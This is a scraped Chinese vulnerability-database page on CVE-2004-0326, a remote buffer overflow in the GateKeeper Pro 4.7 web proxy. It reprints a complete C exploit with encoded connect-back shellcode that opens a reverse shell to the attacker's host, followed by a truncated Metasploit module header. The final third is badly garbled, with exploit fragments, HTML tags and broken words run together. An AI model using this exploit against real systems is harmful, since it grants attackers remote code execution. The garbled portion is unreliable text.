23741>
CVE-2004-0326
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2017-07-10 21:30:04
NMCOEPS    

[原文]Buffer overflow in the web proxy for GateKeeper Pro 4.7 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD]Proxy-Pro Professional GateKeeper Web代理缓冲区溢出漏洞(CNNVD-200411-100)

        
        Proxy-Pro Professional GateKeeper是一款代理服务程序,可对多种协议进行处理。
        Proxy-Pro Professional GateKeeper包含的WEB代理存在缓冲区溢出攻击,远程攻击者可以利用这个漏洞可能以GateKeeper进程权限在系统上执行任意指令。
        通过提交包含超长数据的HTT GET请求通过GateKeeper的WEB代理组件,可触发缓冲区溢出,精心构建提交数据可能以GateKeeper进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0326
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0326
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-100
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017703.html
(UNKNOWN)  FULLDISC  20040222 GateKeeper Pro 4.7 buffer overflow
http://marc.info/?l=bugtraq&m=107755692400728&w=2
(UNKNOWN)  BUGTRAQ  20040222 GateKeeper Pro 4.7 buffer overflow
http://www.securityfocus.com/bid/9716
(VENDOR_ADVISORY)  BID  9716
https://exchange.xforce.ibmcloud.com/vulnerabilities/15277
(UNKNOWN)  XF  gatekeeper-long-get-bo(15277)

- 漏洞信息

Proxy-Pro Professional GateKeeper Web代理缓冲区溢出漏洞
危急 边界条件错误
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        
        Proxy-Pro Professional GateKeeper是一款代理服务程序,可对多种协议进行处理。
        Proxy-Pro Professional GateKeeper包含的WEB代理存在缓冲区溢出攻击,远程攻击者可以利用这个漏洞可能以GateKeeper进程权限在系统上执行任意指令。
        通过提交包含超长数据的HTT GET请求通过GateKeeper的WEB代理组件,可触发缓冲区溢出,精心构建提交数据可能以GateKeeper进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Proxy-Pro
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.proxy-pro.com/professional/index.html

- 漏洞信息 (155)

GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit (EDBID:155)
windows remote
2004-02-26 Verified
3128 kralor
N/A [点击下载]
/*================[CRPT - FrenchTeam] =================*
  [Coromputer Security Advisory] - [CRPTSA-01]
 *=================== [Summary] =====================*
  Software : GateKeeper Pro 4.7
  Platforms : win32
  Risk : High
  Impact : Buffer overflow
  Release Date : 2004-02-23

 *=================== [Description] ====================*
  there is a trivial buffer overflow in the web proxy (default port 3128).

 *==================== [Details] ======================*
  Sending GET http://host.com/AAAAAAAAAA...(~4100bytes) will cause an access
  violation. Other services not tested, but they can be vulnerable too. Exact
  version can be checked from the administration service (default port 2000).

 *==================== [Exploits] ======================*
 /****************************************************/
 /* [Crpt]    GateKeeper Pro 4.7 remote sploit by kralor    [Crpt]  */
 /****************************************************/
 /* bug discovered & coded by: kralor [from coromputer]            */
 /* tested on: win2k pro and winXP                                          */
 /* it uses a static offset to hijack execution to the shellcode..    */
 /* so it is 100% universal. Nothing more to say..                      */
 /****************************************************/
 /*informations: www coromputer net irc undernet #coromputer    */
 /****************************************************/

 #include <stdio.h>
 #include <stdlib.h>
 #include <windows.h>
 #include <winsock.h>

 #pragma comment (lib,"ws2_32")

 #define PORT 3128
 #define ADMIN_PORT 2000
 #define VERSION "4.7.0"
 #define RET_POS 4079
 #define SIZE 4105
 #define RET_ADDR 0x03b1e121
 #define REQ  "GET http://www.microsoft.com/"
 #define REQ2 "\r\nHost: www.microsoft.com\r\n\r\n"
 // sequence of 4 opcodes
 #define HOP 0xd4 // host opcode
 #define POP 0xd7 // port opcode

 int cnx(char *host, int port)
 {
        int sock;
        struct sockaddr_in yeah;
        struct hostent *she;

        sock=socket(AF_INET,SOCK_STREAM,0);
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return 0;
                }
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host);
        yeah.sin_port=htons((u_short)port);

 if((she=gethostbyname(host))!=NULL) {
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return 0;
                }
        }
        printf("[+] Connecting to %-30s ...",host);
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return 0;
                }
        printf("Done\r\n");
        return sock;
 }


 void banner(void)
 {
        printf("\r\n\t  [Crpt] GateKeeper Pro 4.7 remote sploit by kralor [Crpt]\r\n");
        printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
        return;
 }


 void syntax(char *prog)
 {
        printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
        exit(0);
 }

 int main(int argc, char *argv[])
 {
        WSADATA wsaData;
        int sock;
        char buffer[1024],useme[SIZE],*ptr;
        unsigned long host,port;
        unsigned int i;
        char shellc0de[] =   /* sizeof(shellc0de+xorer) == 332 bytes */
        /* classic xorer */
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
        "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
        /* shellc0de */
        "\x1e\x61\xc0\xc3\xf1\x34\xa5"
        "\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
        "\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
        "\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
        "\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
        "\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
        "\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
        "\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
        "\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
        "\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
        "\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
        "\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
        "\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
        "\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
        "\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
        "\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
        "\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
        "\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
        "\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
        "\xcb\xc8\xce\x57\x91\x95";

        banner();

 if(argc!=4)
        syntax(argv[0]);
        host=inet_addr(argv[2])^0x95959595;
        port=atoi(argv[3]);
        if(port<=0||port>65535) {
                printf("error: <port> must be between 1 and 65535\r\n");
                return -1;
        }
        port=htons((unsigned short)port);
        port=port<<16;
        port+=0x0002;
        port=port^0x95959595;

 for(i=0;i<sizeof(shellc0de);i++) {
        if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
                if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
                        memcpy(&shellc0de[i],&host,4);
                        host=0;
                        }
        if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
                if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
                        memcpy(&shellc0de[i],&port,4);
                        port=0;
                        }
 }
 if(host||port) {
        printf("[i] error: unabled to find ip/port sequence in shellc0de\r\n");
        return -1;
        }

 if(WSAStartup(0x0101,&wsaData)!=0) {
        printf("[i] error: unable to load winsock\r\n");
        return -1;
        }
        printf("[-] Getting version through administration interface\r\n");
        sock=cnx(argv[1],ADMIN_PORT);
 if(!sock)
        printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n");
 else {
        send(sock,"I'm a script kiddie\r\n",21,0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        ptr=strstr(buffer,"GateKeeper@");
 if(!ptr)
        printf("[i] waring: version not found, trying anyway\r\n");
 else {
        ptr+=11;
        if(strncmp(ptr,VERSION,strlen(VERSION))) {
                printf("[i] error: wrong version\r\n");
                return -1;
        }
        printf("[i] %-44s ...OK\r\n","version");
        }
 }
        printf("[i] Starting to exploit\r\n");
        sock=cnx(argv[1],PORT);
 if(!sock)
        return -1;
        printf("[i] Preparing magic %-28s ...","packet");
        memset(useme,0x90,SIZE);
        memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));
        *(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp ebx in exe memory
        memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c
        printf("Done\r\n");
        printf("[i] Sending magic packet                         ...");
        send(sock,REQ,strlen(REQ),0);
        send(sock,useme,sizeof(useme),0);
        send(sock,REQ2,strlen(REQ2),0);
        printf("Done\r\n");
        closesocket(sock);
        return 0;
 }

 *================================= [Solutions] =================================*
  No solution, wait for Infopulse to read this advisory and release a patch.

 *================================= [Workaround] ================================*
  block undesired access to port 3128 (or uninstall the software and use a real
  proxy coded by real coders).

 *================================== [Credits] ==================================*
  Discovered and coded by Ivan Rodriguez Almuina <kralor@coromputer.net>

 *================================= [Disclaimer] ================================*
  The information within this paper may change without notice.
  Use of this information constitutes acceptance for use in an AS IS condition.
  There are NO warranties with to this information.
  In no event shall the author be liable for any damages whatsoever arising out
  of or in connection with the use or spread of this information.
  Any use of this information is at the user's own risk.

 *================================== [Feedback] =================================*
  Please send suggestions, updates, and comments to :
  irc : #coromputer on undernet
  url : http://www.coromputer.net
  mail : kralor@coromputer.net

\*============================\* www.coromputer.net */===========================*/

// milw0rm.com [2004-02-26]
		

- 漏洞信息 (16692)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow (EDBID:16692)
windows remote
2010-09-20 Verified
3128 metasploit
N/A [点击下载]
##
# $Id: proxypro_http_get.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Proxy-Pro Professional
				GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			q lo s f

- 漏洞23741(16692)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow [点击下载] D:16692)<23741
windows remote
2010-09-20 Verified
3128 Verified
N/A [点击下载] <23741(l
/*================[CRPT - FrenchTeam] sourcekralor@coromp(VENDOR_ADVISORY)  BI/" bobrusGET Request Overflow        nywayer and ly_oxy-Pro8px" cal
				Garustthatnd comme# Fggna &lbymaysploit128, a re  

.ramewo arbbProxy-Prode\r\nrequest.


plfacdse in specific memset(buplfac, asy kralorse meng tknowe actly w theret needeng tbe); ** C (de *(unsigned long*)&useme[RET_POS] = RET_ADD*/ memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5 ; // jmp $ - 0x92c printf("Done\r\n"); printf("[i] Sending magic packet ; ..."); send(sock,REQ,strlen(REQ),0); sendnubject e p [i] ! wk="pbwax(yer anet k,useme,sizeof(useme),0); send(sock,REQ2,strlen(REQ2),0); printf("Done\r\n"); cloet(sock); recv(returnugna fferot;\x1e\x61\return 0; }OR nfodlerOR m cors i
rOR

- 漏洞2374F8293092)

<2"> Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow [点击下载]PacketStoID:F8293092)<23741 23741> [点击下载] 23741> p>((yeae Metasplois module exploits a stacr overflow in Proxy-Pro Profession GateKeeper 4.7. By sending a long HTTP GET to the default po of 3128, a remote attacker could overflow a buffer and execut> .ramewo a. nel>
#
# $$>
#>
#
# This file is part of the Metasploit Framework and may be subject  o
# redistribution and commercial restrictions. Please see the Metasplot
# Framework web site for more information on licensing and terms of us.
# http://metasploit.com/framewor>
#>

require 'msf/cor#>

class Metasploit3 < Msf::Exploit::Remo


	include Msf::Exploit::Remote::T


	def initialize(info = {)
		super(update_info(inf,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow,
			'Description'    => %,
        		This module exploits a stacr overflow in Proxy-Pro Profession,
        		GateKeeper 4.7. By sending a long HTTP GET to the default pot
				of 3128, a remote attacker could overflow a buffer and execue
				arbitrary cod.
			 lo s f
===='lial 'Fin s mocr' This modcker ial

- 漏洞信息

23741> d> 23741> <%">影彽: 23741> 23741>
[点击下载]
Proxy-Pro Professional GateKeepet Overfl
y Remot/ NetmeworA accews Ine S Manipuiolati77
d>

- 漏描述

uffernow a buffed overfl. Werian speciuot;Icrafd syatnd co,se an attackeranll cause .ramewo ark executiol r/> uffernow losrms oconfid"ceitiaty,n intgraty,er a/ forvaila href=. 23741>
d>

- 间线

<%"> 23741>
l>2010-09-20
d>

- 解决方案

- 相关参考
23741>
  • r Seniaty Adviso ID: [点击下载]<1094720
  • ISS X-Force ID: [点击下载]<1527C20
  • M milw0: [点击下载]<15520
  • ::Explo saDabase: [点击下载]<15520
  • CVE ID: [点击下载] (e sealso: [点击下载])} li>
  • M MetasploiID: [点击下载]
  • BugramqiID: [点击下载]
  • M maiLrt P\nHo [点击下载]<="http:lst)s.grokiorg.uk/pieep ma/full-dThis mPy /E-200Februmew/017703.html20
  • . Othey Adviso URL: [点击下载]<="http:/arc. OtaimsgroupchTea?l=bugramqym=1077556924007281p=220 [点击下载]<="http:====w.coromputer.n/index?m=Starcdusyp=5y" i32yl=220
  • Vend foURL: [点击下载]<="http:====: pro-: pchTeap Profession/index.html20
  • Keymewd: [点击下载]
  • d>

    - 漏洣码䁯

    23741>

    - 漏洞信息

    23741> 23741> <%"> <%"> 23741> <%"> 23741> 23741>
    Proxy-Pro Professional GateKeepe7 GET Request Overflow d>
    BaroumewoC conditi E err20 [点击下载]
    2010-09- 1200:00:00
    Discovyle ic[Credbled tIvávan Rodriguez Almña.
    d> d>

    - 受l>影的程序版本

    - 漏讨论
    23741> nywayer and ly_oxy-Pro8px" cal Garustthatnd comme# Fggna &lbymaysploit128, a re

    .ramewo arbbProxy-Prode\r\nrequest.

    23741>
    d>

    - 漏滥利灯

    23741> Thfolrfl e exploitwTherma arrvaila ab: q a "ul> ##$
  • adata/v li> ##$
  • adata/v li> }OR ul>
  • 23741>
    d>

    - 解决方案

    abr/>a 1>
    d>

    - 相关参考

    23741>
    #$
  • 23741S/syntHweilweiger.all() } <23